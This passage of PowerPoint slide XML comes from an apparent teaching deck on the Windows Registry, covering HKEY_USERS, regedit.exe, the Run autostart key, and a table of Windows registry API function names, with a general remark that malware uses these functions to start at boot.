                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>HKEY_USERS</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="1600200" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Defines settings for the default user, new users, and current users</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="632" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="745200" y="5733360"/>
            <a:ext cx="7787160" cy="823320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>Registry Editor (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>regedit.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Teko"/>
                <a:ea typeface="Teko"/>
              </a:rPr>
              <a:t>): a built-in Windows tool used to view and edit the registry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Windows Registry</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="634"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Programs that Run Automatically</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>HKLM\Software\Microsoft\Windows\CurrentVersion\Run</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="635" name="Google Shape;1150;p118" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="2391840"/>
            <a:ext cx="8818920" cy="4465800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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Windows Registry</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="637"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Common Registry Functions</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Malware often uses registry functions that are part of the Windows API to modify the registry to run automatically when the system boots</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-151920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-151920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="638" name="Table 3"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="179640" y="3213000"/>
          <a:ext cx="8782920" cy="1599840"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2378520"/>
                <a:gridCol w="2134440"/>
                <a:gridCol w="2134440"/>
                <a:gridCol w="2135520"/>
              </a:tblGrid>
              <a:tr h="603720">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>RegCloseKey</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91440" marR="91440">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="f8f9fa"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>RegOpenKey</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91440" marR="91440">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="f8f9fa"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>RegConnectRegistry</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91440" marR="91440">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="f8f9fa"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>RegOpenKeyEx </a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91440" marR="91440">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="f8f9fa"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="603720">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>RegCreateKey</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91440" marR="91440">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="f8f9fa"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>RegQueryInfoKey</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91440" marR="91440">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="f8f9fa"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>RegCreateKeyEx</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91440" marR="91440">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="f8f9fa"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>RegQueryMultipleValues </a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91440" marR="91440">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="f8f9fa"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="347760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>RegDeleteKey</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91440" marR="91440">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="f8f9fa"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>RegQueryValue</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91440" marR="91440">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="f8f9fa"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>RegDeleteValue</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91440" marR="91440">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="f8f9fa"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>RegQueryValueEx </a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91440" marR="91440">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="f8f9fa"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="347760">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>RegEnumKey</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91440" marR="91440">
                    <a:lnL w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnL>
                    <a:lnR w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnR>
                    <a:lnT w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnT>
                    <a:lnB w="9360">
                      <a:solidFill>
                        <a:srgbClr val="a2a9b1"/>
                      </a:solidFill>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="f8f9fa"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr anchor="ctr">
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>RegReplaceKey</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
